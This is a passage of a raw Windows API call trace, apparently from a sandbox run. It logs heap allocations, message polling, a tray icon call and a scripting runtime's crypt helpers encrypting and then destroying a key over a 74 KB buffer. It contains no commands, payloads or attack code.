[0031.314] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0031.314] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2d8 | out: hHeap=0x770000) returned 1 [0031.314] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0031.314] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c820 | out: hHeap=0x770000) returned 1 [0031.314] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0031.314] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c820 [0031.314] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0031.314] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca30 [0031.314] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0031.314] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897d8 [0031.314] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0031.314] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb20 [0031.314] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0031.314] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd60 [0031.314] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0031.314] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9b8 [0031.314] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0031.314] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c910 [0031.314] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0031.315] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0031.315] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0031.315] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0031.315] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8895c8 [0031.315] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0031.315] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0031.315] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0031.315] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0031.315] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0031.315] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0031.315] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0031.315] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0031.315] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0031.315] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b19b8 | out: hHeap=0x770000) returned 1 [0031.315] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc28 [0031.315] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0031.315] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19b8 [0031.315] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c898 [0031.315] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2d8 [0031.315] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae948 [0031.315] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0031.315] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc10 [0031.315] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da338 [0031.315] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0031.315] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1a8 [0031.315] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2d8 | out: hHeap=0x770000) returned 1 [0031.315] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cce8 [0031.316] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2d8 [0031.316] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2d8 | out: hHeap=0x770000) returned 1 [0031.316] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbf8 | out: hHeap=0x770000) returned 1 [0031.316] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0031.316] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc10 | out: hHeap=0x770000) returned 1 [0031.316] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0031.316] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0031.316] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0031.316] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c898 | out: hHeap=0x770000) returned 1 [0031.316] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0031.316] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b19b8 | out: hHeap=0x770000) returned 1 [0031.316] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0031.316] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cce8 [0031.316] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0031.316] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c898 [0031.316] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0031.316] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc10 [0031.316] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0031.316] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19b8 [0031.316] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0031.316] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0031.316] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae948 [0031.316] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0031.316] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8c8 [0031.316] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1a8 [0031.316] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb68 [0031.316] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2d8 [0031.316] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0031.316] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0031.316] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0031.316] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0031.316] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb68 | out: hHeap=0x770000) returned 1 [0031.317] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2d8 | out: hHeap=0x770000) returned 1 [0031.317] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8c8 | out: hHeap=0x770000) returned 1 [0031.317] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0031.317] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0031.317] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0031.317] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbf8 | out: hHeap=0x770000) returned 1 [0031.317] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0031.317] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b19b8 | out: hHeap=0x770000) returned 1 [0031.317] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0031.317] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0031.317] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0031.317] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0031.317] CryptGetKeyParam (in: hKey=0x7c21c0, dwParam=0x7, pbData=0x7da3e8, pdwDataLen=0x6adcf0, dwFlags=0x0 | out: pbData=0x7da3e8*=0x660e, pdwDataLen=0x6adcf0*=0x4) returned 1 [0031.317] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 1 [0031.317] TranslateMessage (lpMsg=0x6ae324) returned 0 [0031.317] DispatchMessageW (lpMsg=0x6ae324) returned 0x0 [0031.317] Shell_NotifyIconW (dwMessage=0x1, lpData=0x6ad9c0) returned 1 [0031.319] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b85a8 | out: hHeap=0x770000) returned 1 [0031.319] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2f8 | out: hHeap=0x770000) returned 1 [0031.319] KillTimer (hWnd=0x50134, uIDEvent=0x1) returned 1 [0031.319] SetTimer (hWnd=0x50134, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0031.320] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0031.320] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0031.320] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.320] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.320] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.320] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.320] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0031.320] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.320] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.320] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0031.320] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b70 | out: hHeap=0x770000) returned 1 [0031.320] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0031.320] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0031.320] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0031.320] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0031.320] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0031.320] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0031.320] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0031.320] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0031.320] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0031.320] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0031.320] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0031.320] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0031.320] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0031.320] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0031.320] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0031.320] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cec8 | out: hHeap=0x770000) returned 1 [0031.320] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0031.320] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.321] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.321] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.321] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0031.321] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.321] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0031.321] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0031.321] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2b8 | out: hHeap=0x770000) returned 1 [0031.321] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0031.322] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0031.322] CryptEncrypt (in: hKey=0x7c21c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x6ae220*=0x123c4, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x6ae220*=0x123d0) returned 1 [0031.322] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.322] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.322] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0031.322] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.322] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.322] CharLowerBuffW (in: lpsz="byte[74705]", cchLength=0xb | out: lpsz="byte[74705]") returned 0xb [0031.322] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.323] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.323] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0031.323] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0031.323] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0031.324] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0031.324] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0031.324] CryptEncrypt (in: hKey=0x7c21c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x8c2390*, pdwDataLen=0x6ae220*=0x123c4, dwBufLen=0x123d0 | out: pbData=0x8c2390*, pdwDataLen=0x6ae220*=0x123d0) returned 1 [0031.324] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.324] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.324] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0031.324] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.324] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.324] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.324] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.324] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0031.324] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1be8 | out: hHeap=0x770000) returned 1 [0031.324] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0031.325] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0031.325] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0031.325] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0031.325] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0031.325] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0031.325] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0031.325] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0031.325] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8f8 | out: hHeap=0x770000) returned 1 [0031.325] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0031.325] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0031.325] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0031.325] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0031.325] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0031.325] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0031.325] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0031.325] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0031.325] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0031.325] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889688 | out: hHeap=0x770000) returned 1 [0031.325] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.330] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.330] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.330] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0031.330] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.333] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.333] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.333] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0031.334] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0031.334] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0031.334] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0031.334] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0031.334] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0031.334] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0031.334] PeekMessageW (in: lpMsg=0x6ae3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae3fc) returned 0 [0031.334] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0031.334] CryptDestroyKey (hKey=0x7c21c0) returned 1 [0031.334] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0031.334] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0031.334] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0031.334] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b19b8 | out: hHeap=0x770000) returned 1 [0031.334] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0031.334] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0031.334] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0031.334] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0031.334] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0031.334] PeekMessageW (in: lpMsg=0x6ae59c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae59c) returned 0 [0031.334] PeekMessageW (in: lpMsg=0x6ae59c, hWnd=0x0, 